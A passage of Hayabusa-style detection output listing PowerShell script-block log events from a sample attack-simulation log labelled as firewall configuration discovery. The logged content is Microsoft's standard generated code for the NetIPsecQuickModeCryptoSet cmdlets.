Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 